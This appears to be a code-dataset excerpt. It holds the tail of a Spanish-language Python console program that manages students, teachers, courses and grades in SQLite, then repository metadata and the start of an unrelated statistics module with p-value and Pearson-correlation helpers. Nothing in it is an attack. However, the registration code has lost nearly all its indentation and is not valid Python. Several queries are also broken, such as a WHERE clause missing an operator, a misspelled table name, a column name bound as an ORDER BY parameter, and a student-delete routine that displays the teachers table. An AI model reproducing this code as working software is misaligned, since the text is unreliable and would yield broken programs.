d = int(input("Digite el codigo de la carrera del nuevo estudiante: "))
e = input("Digite el estado del estudiante(Matriculado, Graduado, Perdida de cupo): ")
f = int(input("Digite el P.A.P.A del estudiante: "))
nuevo_usuario = (a,b,c,d,e,f)
lector.execute("INSERT INTO ESTUDIANTES(NOMBRE, APELLIDO, ID, CODPDE, ESTADO, PAPA) VALUES(?,?,?,?,?,?)",nuevo_usuario)
database.commit()
break
except:
print("Ocurrido un error, por favor digite denuevo.")
os.system('cls')
# This function adds teachers to the database
def AñadirProfesor(lector,database):
graficar.Simple()
while True:
try:
a = input("Digite el nombre del nuevo docente: ")
b = input("Digite el apellido del nuevo docente: ")
c = input("Digite el ID del nuevo docente: ")
d = "Docente"
nuevo_docente = (a,b,c,d)
lector.execute("INSERT INTO PROFESORES(NOMBRE, APELLIDO, ID, ESTADO) VALUES(?,?,?,?)",nuevo_docente)
database.commit()
break
except:
print("Ocurrido un error, por favor digite denuevo.")
os.system('cls')
# This function adds courses (materias) to the database
def AñadirMateria(lector,database):
graficar.Simple()
while True:
a = input("Digite el codigo de la nueva materia: ")
b = input("Digite el nombre de la nueva materia: ")
c = input("Digite el codigo de la facultad a la que pertenece la materia: ")
x = input("Digite el codigo del departamento que la dicta: ")
d = int(input("Digite los creditos de la nueva materia: "))
f = ""
while True:
e = input("Si tiene una materia prerequisito digite el codigo de esta, si no digite 0: ")
lector.execute("SELECT * FROM MATERIAS WHERE CODIGO = ? ",(e,))
if (len(lector.fetchall()) == 1):
f = e
lector.execute("SELECT NOMBRE FROM MATERIAS WHERE CODIGO = ?",(e,))
e = lector.fetchall()
e = ConvertirString(e)
break
elif (e == "0"):
f = e
e = "Sin prerequisito"
break
else:
print("Materia no existente")
if ("Y" == input("¿Desea ver las materias existentes Y||N?: ")):
Mostrar(lector,"MATERIAS")
else:
pass
break
nueva_materia = (a,b,c,x,d,e,f)
lector.execute("INSERT INTO MATERIAS(CODIGO, NOMBRE, CODFACULTAD, CODDEPA, CREDITOS, PREREQ, CODPREREQ) VALUES(?,?,?,?,?,?,?)",nueva_materia)
database.commit()
os.system('cls')
# This function assigns courses to teachers
def AsignarMaterias(lector,database):
graficar.Simple()
while True:
a = input("Digite el codigo de la materia a asignar: ")
lector.execute("SELECT * FROM MATERIAS WHERE CODIGO = ?",(a,))
if (len(lector.fetchall()) == 0):
print("Materia no existente")
if ("Y" == input("¿Desea ver las materias existentes Y||N?: ")):
Mostrar(lector,"MATERIAS")
else:
break
else:
while True:
e = input("Digite el ID del docente: ")
lector.execute("SELECT * FROM PROFESORES WHERE ID = ?",(e,))
if(lector.fetchall()==0):
print("Docente no encontrado")
if ("Y" == input("¿Desea ver los docentes disponibles Y||N?: ")):
Mostrar(lector,"PROFESORES")
lector.execute("SELECT ESTADO FROM PROFESORES WHERE ID = ?",(e,))
t = lector.fetchall()
t = ConvertirString(t)
if (t != "Docente"):
input("El profesor no esta dictando clases por el momento")
break
else:
while True:
lector.execute("SELECT NOMBRE FROM MATERIAS WHERE CODIGO = ?",(a,))
b = lector.fetchall()
b = ConvertirString(b)
lector.execute("SELECT NOMBRE FROM PROFESORES WHERE ID = ?",(e,))
c = lector.fetchall()
c = ConvertirString(c)
lector.execute("SELECT APELLIDO FROM PROFESORES WHERE ID = ?",(e,))
d = lector.fetchall()
d = ConvertirString(d)
f = int(input("Digite la hora de inicio de la clase (24h): "))
g = int(input("Digite la durancion de la clase: "))
h = input("Digite las iniciales de los dias de clase (L,M,C,J,V): ")
i = int(input("Digite el numero de cupos disponibles: "))
lector.execute("SELECT * FROM MATERIASDOC WHERE ID = ? AND DIAS = ?",(e,h,))
nueva_asignacion = (a,b,c,d,e,f,g,h,i)
lector.execute('''INSERT INTO MATERIASDOC(CODIGO, NOMBRE, NOMDOC,
APDOC, ID, HORARIOINIT, HORASCLASE, DIAS,
CUPOS) VALUES(?,?,?,?,?,?,?,?,?)''',nueva_asignacion)
database.commit()
break
break
break
os.system('cls')
# This function lets students enroll in courses
def InscribirMaterias(lector,database):
graficar.Simple()
while True:
a = input("Digite el codigo de la materia a inscribir: ")
lector.execute("SELECT * FROM MATERIASDOC WHERE CODIGO = ?",(a,))
if (len(lector.fetchall()) == 0):
print("Materia no existente")
if ("Y" == input("¿Desea ver las materias existentes Y||N?: ")):
Mostrar(lector,"MATERIASDOC")
lector.execute("SELECT CUPOS FROM MATERIASDOC WHERE CODIGO = ? AND CUPOS != 0",(a,))
if (len(lector.fetchall()) == 0):
input("No hay cupos disponibles para esta materia")
break
else:
while True:
c = input("Digite el ID del estudiante: ")
lector.execute("SELECT * FROM ESTUDIANTES WHERE ID = ?",(c,))
if(len(lector.fetchall()) == 0):
print("Estudiante no encontrado")
if ("Y" == input("¿Desea ver los estudiantes registrados Y||N?: ")):
Mostrar(lector,"ESTUDIANTES")
lector.execute("SELECT ESTADO FROM ESTUDIANTES WHERE ID = ?",(c,))
t = lector.fetchall()
t = ConvertirString(t)
if(t != "Matriculado"):
input("El estudiante no esta en condicion de inscribir materias")
break
lector.execute("SELECT CODPREREQ FROM MATERIAS WHERE CODIGO = ?",(a,))
z = lector.fetchall()
z = ConvertirString(z)
if (z != "0"):
lector.execute("SELECT * FROM MATERIASEST WHERE CODIGO = ? AND IDEST = ? AND ESTATUS == 'Aprobado'",(z,c,))
y = lector.fetchall()
y = ConvertirLista(y)
if (z != "0" and z not in y):
input("El estudiante no cumple con el prerequisito solicitado")
break
else:
prereq = True
if (z == "0" or prereq == True):
while True:
try:
lector.execute("SELECT NOMBRE FROM MATERIAS WHERE CODIGO = ?",(a,))
b = lector.fetchall()
b = ConvertirString(b)
lector.execute("SELECT NOMBRE FROM ESTUDIANTES WHERE ID = ?",(c,))
d = lector.fetchall()
d = ConvertirString(d)
lector.execute("SELECT APELLIDO FROM ESTUDIANTES WHERE ID = ?",(c,))
e = lector.fetchall()
e = ConvertirString(e)
lector.execute("SELECT ID FROM MATERIASDOC WHERE CODIGO = ?",(a,))
g = lector.fetchall()
g = ConvertirString(g)
lector.execute("SELECT NOMDOC FROM MATERIASDOC WHERE CODIGO = ?",(a,))
h = lector.fetchall()
h = ConvertirString(h)
lector.execute("SELECT APDOC FROM MATERIASDOC WHERE CODIGO = ?",(a,))
i = lector.fetchall()
i = ConvertirString(i)
lector.execute("SELECT HORARIOINIT FROM MATERIASDOC WHERE CODIGO = ?",(a,))
j = lector.fetchall()
j = ConvertirNum(j)
lector.execute("SELECT HORASCLASE FROM MATERIASDOC WHERE CODIGO = ?",(a,))
k = lector.fetchall()
k = ConvertirNum(k)
lector.execute("SELECT DIAS FROM MATERIASDOC WHERE CODIGO = ?",(a,))
l = lector.fetchall()
l = ConvertirString(l)
m = "Cursando"
n = 0
nueva_asignacion = (a,b,c,d,e,g,h,i,j,k,l,m,n)
lector.execute('''INSERT INTO MATERIASEST(CODIGO, NOMBRE, IDEST,
NOMEST, APEST,IDDOC,
NOMDOC, APDOC, HORARIOINIT,
HORASCLASE, DIAS, ESTATUS, CALIFICACIÓN) VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?)''',nueva_asignacion)
lector.execute("SELECT CUPOS FROM MATERIASDOC WHERE ID = ?",(g,))
o = lector.fetchall()
o = ConvertirNum(o)
o = o-1
lector.execute("UPDATE MATERIASDOC SET CUPOS = ? WHERE ID = ?",(o,g,))
database.commit()
break
except:
print("Ocurrido un error, digite denuevo porfavor.")
break
break
os.system('cls')
# Function to drop courses a student is enrolled in
def CancelarMaterias(lector,database):
graficar.Simple()
z = input("Digite el Id del estudiante: ")
lector.execute("SELECT * FROM MATERIASEST WHERE IDEST = ?",(z,))
y = lector.fetchall()
if (len(y) == 0):
ñ = input("El estudiante no tiene ninguna materia inscrita.")
else:
x = 0
w = 14
k = 0
for i in range(len(y)):
for j in y[i]:
if (k == w):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
print(" ")
y = input("Digite el codigo de la materia que desea eliminar: ")
while True:
try:
lector.execute("DELETE FROM MATERIASEST WHERE IDEST = ? AND CODIGO = ?",(z,y,))
break
except:
print("Codigo no existente.")
database.commit()
os.system('cls')
# Function to modify a student
def ModificarEstudiante(lector,database):
graficar.Simple()
z = input("Digite el ID del estudiante que desee modificar: ")
lector.execute("SELECT * FROM ESTUDIANTES WHERE ID = ?",(z,))
y = lector.fetchall()
x = 0
w = 6
k = 0
for i in range(len(y)):
for j in y[i]:
if (k == w):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
print("")
graficos.MenuEstudiantes()
while True:
try:
a = int(input("¿Que desea modificar del estudiante?"))
break
except:
print("Opcion no valida, digite denuevo.")
if (a == 1):
b = input("Digite el nuevo nombre: ")
lector.execute("UPDATE ESTUDIANTES SET NOMBRE = ? WHERE ID = ? ",(b,z,))
lector.execute("UPDATE MATERIASEST SET NOMEST = ? WHERE IDEST = ?",(b,z,))
if (a == 2):
b = input("Digite el nuevo apellido: ")
        lector.execute("UPDATE ESTUDIANTES SET APELLIDO = ? WHERE ID = ? ",(b,z,))
lector.execute("UPDATE MATERIASEST SET APEST = ? WHERE IDEST = ?",(b,z,))
if (a == 3):
b = input("Digite el codigo de la nueva carrera: ")
lector.execute("UPDATE ESTUDIANTES SET CODPDE = ? WHERE ID = ? ",(b,z,))
lector.execute("DELETE FROM MATERIASEST WHERE IDEST = ?",(z,))
if (a == 4):
b = input("Digite el nuevo estado del estudiante: ")
lector.execute("UPDATE ESTUDIANTES SET ESTADO = ? WHERE ID = ? ",(b,z,))
if (a == 5):
pass
database.commit()
os.system('cls')
# Function to modify a teacher
def ModificarProfesor(lector,database):
graficar.Simple()
z = input("Digite el ID del profesor que desee modificar: ")
lector.execute("SELECT * FROM PROFESORES WHERE ID = ?",(z,))
y = lector.fetchall()
x = 0
w = 4
k = 0
for i in range(len(y)):
for j in y[i]:
if (k == w):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
print("")
graficos.MenuProfesor()
while True:
try:
a = int(input("¿Que desea modificar del docente?"))
break
except:
print("Opcion no valida, digite denuevo.")
if (a == 1):
b = input("Digite el nuevo nombre: ")
lector.execute("UPDATE PROFESORES SET NOMBRE = ? WHERE ID = ? ",(b,z,))
lector.execute("UPDATE MATERIASDOC SET NOMDOC = ? WHERE ID = ?",(b,z,))
        lector.execute("UPDATE MATERIASEST SET NOMDOC = ? WHERE IDDOC = ?",(b,z,))
if (a == 2):
b = input("Digite el nuevo apellido: ")
lector.execute("UPDATE PROFESORES SET APELLIDO = ? WHERE ID = ? ",(b,z,))
lector.execute("UPDATE MATERIASDOC SET APDOC = ? WHERE ID = ?",(b,z,))
lector.execute("UPDATE MATERIASEST SET APDOC = ? WHERE IDDOC = ?",(b,z,))
if (a == 3):
b = input("Digite el nuevo estado del docente: ")
lector.execute("UPDATE PROFESORES SET ESTADO = ? WHERE ID = ? ",(b,z,))
lector.execute("DELETE FROM MATERIASDOC WHERE ID = ?",(z,))
lector.execute("DELETE FROM MATERIASEST WHERE IDDOC = ?",(z,))
if (a == 4):
pass
database.commit()
os.system('cls')
# Function to modify a course
def ModificarMaterias(lector,database):
graficar.Simple()
z = input("Digite el codigo de la materia que desee modificar: ")
    lector.execute("SELECT * FROM MATERIAS WHERE CODIGO = ?",(z,))
y = lector.fetchall()
x = 0
w = 14
k = 0
for i in range(len(y)):
for j in y[i]:
if (k == w):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
print("")
graficos.MenuMaterias()
while True:
try:
a = int(input("¿Que desea modificar del docente?"))
break
except:
print("Opcion no valida, digite denuevo.")
if (a == 1):
b = input("Digite el nuevo nombre: ")
        lector.execute("UPDATE MATERIAS SET NOMBRE = ? WHERE CODIGO = ? ",(b,z,))
        lector.execute("UPDATE MATERIASDOC SET NOMBRE = ? WHERE CODIGO = ?",(b,z,))
        lector.execute("UPDATE MATERIASEST SET NOMBRE = ? WHERE CODIGO = ?",(b,z,))
if (a == 2):
b = int(input("Digite el nuevo numero de creditos: "))
lector.execute("UPDATE MATERIAS SET CREDITOS = ? WHERE ID = ? ",(b,z,))
if (a == 3):
pass
database.commit()
os.system('cls')
# Function to delete a student
def EliminarEstudiante(lector,database):
graficar.Simple()
while True:
try:
z = input("Digite el ID del estudiante que desea eliminar: ")
lector.execute("SELECT * FROM PROFESORES WHERE ID = ?",(z,))
y = lector.fetchall()
x = 0
            w = 6
k = 0
for i in range(len(y)):
for j in y[i]:
if (k == w):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
a = input('''
Advertencia: ¿Esta seguro de querer eliminar al usuario del sistema SUN? Toda la informacion se perdera
sin posibilidad de ser recuperada Y||N: ''')
b = input("Escriba la palabra 'Eliminar' para confirmar su ocpion: ")
if(a == "Y" and b == "Eliminar"):
lector.execute("DELETE FROM ESTUDIANTES WHERE ID = ? ",(z,))
lector.execute("DELETE FROM MATERIASEST WHERE IDEST = ? ",(z,))
database.commit()
break
else:
input("Cancelando borrado de datos.")
break
except:
print("Ocurrido un error, por favor digite denuevo")
os.system('cls')
# Function to delete a professor
def EliminarProfesor(lector,database):
graficar.Simple()
while True:
try:
z = input("Digite el ID del profesor que desea eliminar: ")
lector.execute("SELECT * FROM PROFESORES WHERE ID = ?",(z,))
y = lector.fetchall()
x = 0
w = 4
k = 0
for i in range(len(y)):
for j in y[i]:
if (k == w):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
a = input('''
Advertencia: ¿Esta seguro de querer eliminar al usuario del sistema SUN? Toda la informacion se perdera
sin posibilidad de ser recuperada Y||N: ''')
b = input("Escriba la palabra 'Eliminar' para confirmar su ocpion: ")
if(a == "Y" and b == "Eliminar"):
lector.execute("DELETE FROM PROFESORES WHERE ID = ? ",(z,))
lector.execute("DELETE FROM MATERIASDOC WHERE ID = ? ",(z,))
lector.execute("DELETE FROM MATERIASEST WHERE IDDOC = ? AND ESTATUS 'cursando' ",(z,))
database.commit()
break
else:
input("Cancelando borrado de datos")
break
except:
print("Ocurrido un error, por favor digite denuevo")
os.system('cls')
# Function to assign a grade to a student
def SubirCalificaciones(lector,database):
graficar.Simple()
z = input("Digite el Id del estudiante: ")
lector.execute("SELECT * FROM MATERIASEST WHERE IDEST = ?",(z,))
y = lector.fetchall()
if (len(y) == 0):
ñ = input("El estudiante no tiene ninguna materia inscrita.")
else:
x = 0
w = 14
k = 0
for i in range(len(y)):
for j in y[i]:
if (k == w):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
print(" ")
y = input("Digite el codigo de la materia que desea calificar: ")
while True:
try:
a = int(input("Digite la calificacion de la materia: "))
lector.execute("UPDATE MATERIASEST SET CALIFICACIÓN = ? WHERE IDEST = ? AND CODIGO = ?",(a,z,y,))
''' if a>30:
lector.execute("SELECT CODIGO FROM MATERIASEST WHERE CALIFICACIÓN = ?",(a,))
b = lector.fetchall()
b = ConvertirString(b)
lector.execute("SELECT CODIGO FROM MATERIASEST WHERE CALIFICACIÓN = ?",(a,))
c = lector.fetchall()
c = ConvertirString(c)
materias_aprobada = (b,c)
lector.execute("INSERT INTO MATERIAAPRO (CODMATERIA, IDEST) VALUES = ?,?",materias_aprobada)
database.commit()'''
break
except:
print("Codigo no existente.")
break
database.commit()
os.system('cls')
# This function computes the student's PAPA (credit-weighted grade average)
def CalcularPAPA(lector,database):
graficar.Simple()
z = input("Digite el Id del estudiante: ")
lector.execute("SELECT CODIGO FROM MATERIASEST WHERE IDEST = ?",(z,))
y = lector.fetchall()
y = ConvertirLista(y)
l = []
m = []
for i in y:
lector.execute("SELECT CREDITOS FROM MATERIA WHERE CODIGO = ?",(i,))
a = lector.fetchall()
a = ConvertirNum(a)
m.append(a)
lector.execute("SELECT CALIFICACIÓN FROM MATERIASEST WHERE CODIGO = ? AND IDEST = ? ",(i,z,))
b = lector.fetchall()
b = ConvertirNum(b)
c = b*a
l.append(c)
n = sum(l)
ñ = sum(m)
p = n//ñ
lector.execute("UPDATE ESTUDIANTES SET PAPA = ? WHERE ID = ?",(p,z,))
database.commit()
os.system('cls')
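# Hypothetical helper (not part of the original program, never called): a
# minimal sketch of the credit-weighted average that CalcularPAPA computes
# above, with made-up numbers. Note the original uses integer division (//),
# so the stored PAPA is truncated.
def _ejemplo_papa():
    creditos = [3, 4, 2]   # made-up credits per course
    notas = [4, 3, 5]      # made-up grades per course
    ponderado = sum(c * n for c, n in zip(creditos, notas))  # 3*4 + 4*3 + 2*5 = 34
    total = sum(creditos)                                    # 9
    return ponderado // total                                # 34 // 9 = 3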
# This function displays the contents of the database
def Mostrar(lector,tabla):
graficar.Simple()
print("")
b = 0
c = "0"
if (tabla == "ESTUDIANTES"):
b = 6
print('''
1.) Nombre
2.) Apellido
3.) ID
4.) PAPA
''')
print("")
d = int(input("Digite el orden que desea: "))
if (d == 1):
c = "NOMBRE"
graficos.ImprimirTabla(tabla)
lector.execute("SELECT * FROM ESTUDIANTES ORDER BY ?",(c,))
if (d == 2):
c = "APELLIDO"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT APELLIDO, NOMBRE, ID, CODPDE, ESTADO, PAPA FROM ESTUDIANTES")
if (d == 3):
c = "ID"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT ID, NOMBRE, APELLIDO, CODPDE, ESTADO, PAPA FROM ESTUDIANTES")
if (d == 4):
c = "PAPA"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT PAPA, NOMBRE, APELLIDO, ID, CODPDE, ESTADO FROM ESTUDIANTES")
elif (tabla == "PROFESORES"):
b = 4
print('''
1.) Nombre
2.) Apellido
3.) ID
''')
print("")
d = int(input("Digite el orden que desea:"))
if (d == 1):
c = "NOMBRE"
graficos.ImprimirTabla(tabla)
lector.execute("SELECT * FROM PROFESORES ORDER BY ?",(c,))
if (d == 2):
c = "APELLIDO"
graficos.ImprimirTabla(tabla)
lector.execute("SELECT APELLIDO, NOMBRE, ID, ESTADO FROM PROFESORES")
if (d == 3):
c = "ID"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT ID, NOMBRE, APELLIDO, ESTADO FROM PROFESORES")
elif (tabla == "MATERIAS"):
b = 7
print('''
1.) Nombre
2.) Codigo
''')
print("")
d = int(input("Digite el orden que desea:"))
if (d == 1):
c = "NOMBRE"
graficos.ImprimirTabla(tabla)
lector.execute("SELECT * FROM MATERIAS ORDER BY ?",(c,))
if (d == 2):
c = "CODIGO"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT CODIGO, NOMBRE, APELLIDO, CODFACULTAD, CODDEPA, CREDITOS, PREREQ, CODPREREQ FROM PROFESORES")
elif (tabla == "MATERIASDOC"):
b = 9
print('''
1.) Nombre de materia
2.) Codigo de materia
3.) Nombre de docente
4.) Apellido de doncente
5.) Id de docente
''')
print("")
d = int(input("Digite el orden que desea:"))
if (d == 1):
c = "NOMBRE"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT NOMBRE, CODIGO, NOMDOC, APDOC, ID, HORARIOINIT, HORASCLASE, DIAS, CUPOS FROM MATERIASDOC")
if (d == 2):
c = "CODIGO"
graficos.ImprimirTabla(tabla)
lector.execute("SELECT CODIGO, NOMBRE, NOMDOC, APDOC, ID, HORARIOINIT, HORASCLASE, DIAS, CUPOS FROM MATERIASDOC")
if (d == 3):
c = "NOMDOC"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT NOMDOC, APDOC, CODIGO, NOMBRE, ID, HORARIOINIT, HORASCLASE, DIAS, CUPOS FROM MATERIASDOC")
if (d == 4):
c = "APDOC"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT APDOC, NOMDOC, CODIGO, NOMBRE, ID, HORARIOINIT, HORASCLASE, DIAS, CUPOS FROM MATERIASDOC")
if (d == 5):
c = "IDDOC"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT ID, APDOC, NOMDOC, CODIGO, NOMBRE, HORARIOINIT, HORASCLASE, DIAS, CUPOS FROM MATERIASDOC")
elif (tabla == "MATERIASEST"):
b = 14
print('''
1.) Id estudiante
2.) Codigo de materia
''')
print("")
d = int(input("Digite el orden que desea:"))
if (d == 1):
c = "NOMBRE"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT IDEST, CODIGO FROM MATERIASEST")
if (d == 2):
c = "CODIGO"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT CODIGO, IDEST FROM MATERIASEST")
if (d == 3):
c = "NOMDOC"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT NOMDOC, APDOC, IDDOC, NOMBRE, CODIGO, NOMEST, APEST, IDEST, HORARIOINIT, DIAS, ESTATUS, CALIFICACIÓN FROM MATERIASEST")
if (d == 4):
c = "APDOC"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT APDOC, NOMDOC, IDDOC, NOMBRE, CODIGO, NOMEST, APEST, IDEST, HORARIOINIT, DIAS, ESTATUS, CALIFICACIÓN FROM MATERIASEST")
if (d == 5):
c = "NOMEST"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT NOMEST, APEST, IDEST, NOMBRE, CODIGO, NOMDOC, APDOC, IDDOC, HORARIOINIT, DIAS, ESTATUS, CALIFICACIÓN FROM MATERIASEST")
if (d == 6):
c = "APEST"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT APEST, NOMEST, NOMBRE, CODIGO, IDEST, IDDOC, NOMDOC, APDOC, HORARIOINIT, DIAS, ESTATUS, CALIFICACIÓN FROM MATERIASEST")
if (d == 7):
c = "IDDOC"
graficos.ImprimirTabla2(tabla)
lector.execute("SELECT IDDOC, NOMDOC, NOMBRE, CODIGO, IDEST, NOMEST, APEST, APDOC, HORARIOINIT, DIAS, ESTATUS, CALIFICACIÓN FROM MATERIASEST")
if (d == 8):
c = "IDEST"
graficos.ImprimirTabla(tabla)
lector.execute("SELECT IDEST, NOMEST, APEST, NOMBRE, CODIGO, IDDOC, NOMDOC, APDOC, HORARIOINIT, DIAS, ESTATUS, CALIFICACIÓN FROM MATERIASEST")
a = lector.fetchall()
k = 0
for i in range(len(a)):
for j in a[i]:
if (k == b):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
wait = input()
os.system('cls')
def BuscarEstudiante(lector,database):
graficar.Simple()
print("")
print('''
1.) Nombre
2.) Apellido
3.) Id
4.) PAPA
''')
print("")
d = []
a = int(input("Digite la opcion de busqueda: "))
if(a == 1):
c = input("Digite el nombre del estudiante: ")
lector.execute("SELECT * FROM ESTUDIANTES WHERE NOMBRE = ?",(c,))
d = lector.fetchall()
graficos.ImprimirTabla("ESTUDIANTES")
if (a == 2):
c = input("Digite el Apellido del estudainte: ")
lector.execute("SELECT * FROM ESTUDIANTES WHERE APELLIDO = ?",(c,))
d = lector.fetchall()
graficos.ImprimirTabla("ESTUDIANTES")
if (a == 3):
c = int(input("Digite el Id del estudiante: "))
lector.execute("SELECT * FROM ESTUDIANTES WHERE ID = ?",(c,))
d = lector.fetchall()
graficos.ImprimirTabla("ESTUDIANTES")
if (a == 4):
c = int(input("Digite el PAPA del estudiante: "))
lector.execute("SELECT * FROM ESTUDIANTES WHERE PAPA = ?",(c,))
d = lector.fetchall()
graficos.ImprimirTabla("ESTUDIANTES")
b = 6
k = 0
for i in range(len(d)):
for j in d[i]:
if (k == b):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
wait = input()
os.system('cls')
def BuscarProfesor(lector,database):
graficar.Simple()
print("")
print('''
1.) Nombre
2.) Apellido
3.) Id
''')
print("")
a = int(input("Digite la opcion de busqueda: "))
d = []
if(a == 1):
c = input("Digite el nombre del Profesor: ")
lector.execute("SELECT * FROM PROFESORES WHERE NOMBRE = ?",(c,))
graficos.ImprimirTabla("PROFESORES")
d = lector.fetchall()
b = 4
k = 0
for i in range(len(d)):
for j in d[i]:
if (k == b):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
if(a == 2):
c = input("Digite el apellido del Profesor: ")
lector.execute("SELECT * FROM PROFESORES WHERE APELLIDO = ?",(c,))
graficos.ImprimirTabla("PROFESORES")
d = lector.fetchall()
b = 4
k = 0
for i in range(len(d)):
for j in d[i]:
if (k == b):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
if(a == 3):
c = int(input("Digite el Id del Profesor: "))
lector.execute("SELECT * FROM PROFESORES WHERE ID = ?",(c,))
graficos.ImprimirTabla("PROFESORES")
d = lector.fetchall()
b = 4
k = 0
for i in range(len(d)):
for j in d[i]:
if (k == b):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
wait = input()
os.system('cls')
def BuscarMateria(lector,database):
graficar.Simple()
print("")
print('''
1.) Nombre
2.) Codigo
''')
print("")
a = int(input("Digite la opcion de busqueda: "))
d = []
if(a == 1):
c = input("Digite el nombre de la materia: ")
lector.execute("SELECT * FROM MATERIAS WHERE NOMBRE = ?",(c,))
graficos.ImprimirTabla("MATERIAS")
d = lector.fetchall()
b = 6
k = 0
for i in range(len(d)):
for j in d[i]:
if (k == b):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
if(a == 2):
c = input("Digite el codigo de la materia: ")
lector.execute("SELECT * FROM MATERIAS WHERE CODIGO = ?",(c,))
graficos.ImprimirTabla("MATERIAS")
d = lector.fetchall()
b = 6
k = 0
for i in range(len(d)):
for j in d[i]:
if (k == b):
k = 0
print("")
print("|",end=" ")
print(j,end=" ")
print("|",end=" ")
k = k + 1
wait = input()
os.system('cls')
def ConvertirString(lista):
    tupla = lista[0]
    texto = ''.join(tupla)  # avoid shadowing the built-in str
    return texto
def ConvertirNum(lista):
tupla = lista[0]
num = int(''.join(map(str, tupla)))
return num
def ConvertirLista(lista):
nueva_lista=[]
for i in lista:
tupla = i
a = ''.join(tupla)
nueva_lista.append(a)
return nueva_lista
def ConvertirListaNum(lista):
nueva_lista=[]
for i in lista:
tupla = i
a = int(''.join(map(str, tupla)))
nueva_lista.append(a)
return nueva_lista
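# Hypothetical usage sketch (not part of the original program, never called):
# the Convertir* helpers above flatten sqlite3 fetchall() results, which come
# back as lists of one-element tuples.
def _ejemplo_convertir():
    filas = [('MAT101',), ('FIS201',)]   # made-up fetchall() result
    codigos = ConvertirLista(filas)      # -> ['MAT101', 'FIS201']
    creditos = ConvertirNum([(4,)])      # -> 4
    return codigos, creditos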
| 39.318075 | 156 | 0.488253 |
b819e906573d2d2a62c515e19022b5d99c4d0576
| 6,698 |
py
|
Python
|
jburt/stats.py
|
jbburt/jburt
|
7745491214ef2b665ca8d1fc526bc802a36985ff
|
[
"MIT"
] | null | null | null |
jburt/stats.py
|
jbburt/jburt
|
7745491214ef2b665ca8d1fc526bc802a36985ff
|
[
"MIT"
] | null | null | null |
jburt/stats.py
|
jbburt/jburt
|
7745491214ef2b665ca8d1fc526bc802a36985ff
|
[
"MIT"
] | null | null | null |
from typing import Collection
from typing import Tuple
import numpy as np
from scipy import special as special
from scipy.stats import pearsonr
from scipy.stats import rankdata
from jburt.mask import mask_nan
def nonparp(stat: float, null_dist: Collection) -> float:
"""
Compute two-sided non-parametric p-value.
    Compute the fraction of elements in `null_dist` which are more extreme than
    `stat`.
Parameters
----------
stat : float
test statistic
null_dist : Collection
samples from null distribution
Returns
-------
float
        Fraction of elements in `null_dist` which are more extreme than `stat`
"""
n = float(len(null_dist))
return np.sum(np.abs(null_dist) > abs(stat)) / n
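# Hypothetical usage sketch (not part of the original module): with a
# permutation-style null distribution, nonparp returns the fraction of null
# statistics that are more extreme than the observed one in absolute value.
def _nonparp_example() -> float:
    rng = np.random.default_rng(0)
    null = rng.standard_normal(1000)   # stand-in for permutation statistics
    return nonparp(2.0, null)          # roughly 0.05 for a standard-normal null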
def abs_pearson(x: np.ndarray, y: np.ndarray) -> float:
"""
Compute absolute value of Pearson correlation coefficient.
Parameters
----------
x : (N,) np.ndarray
y : (N,) np.ndarray
Returns
-------
r : float
absolute value of correlation
"""
return abs(pearsonr(x, y)[0])
def pearsonr_multi(X: np.ndarray, Y: np.ndarray) -> np.ndarray:
"""
Multi-dimensional Pearson correlation between rows of `X` and `Y`.
Parameters
----------
X : (N,P) np.ndarray
Y : (M,P) np.ndarray
Returns
-------
(N,M) np.ndarray
Raises
------
TypeError : `X` or `Y` is not array_like
ValueError : `X` and `Y` are not same size along second axis
"""
if not isinstance(X, np.ndarray) or not isinstance(Y, np.ndarray):
raise TypeError('X and Y must be numpy arrays')
if X.ndim == 1:
X = X.reshape(1, -1)
if Y.ndim == 1:
Y = Y.reshape(1, -1)
n = X.shape[1]
if n != Y.shape[1]:
raise ValueError('X and Y must be same size along axis=1')
mu_x = X.mean(axis=1)
mu_y = Y.mean(axis=1)
s_x = X.std(axis=1, ddof=n - 1)
s_y = Y.std(axis=1, ddof=n - 1)
cov = np.dot(X, Y.T) - n * np.dot(
mu_x[:, np.newaxis], mu_y[np.newaxis, :])
return cov / np.dot(s_x[:, np.newaxis], s_y[np.newaxis, :])
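# Hypothetical sanity check (not part of the original module): each entry of
# pearsonr_multi should match scipy.stats.pearsonr on the corresponding rows.
def _pearsonr_multi_example() -> bool:
    rng = np.random.default_rng(0)
    X = rng.standard_normal((3, 50))
    Y = rng.standard_normal((2, 50))
    R = pearsonr_multi(X, Y)         # shape (3, 2)
    r00 = pearsonr(X[0], Y[0])[0]    # scalar reference value for rows 0, 0
    return bool(np.isclose(R[0, 0], r00))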
def spearmanr_multi(X: np.ndarray, Y: np.ndarray) -> np.ndarray:
"""
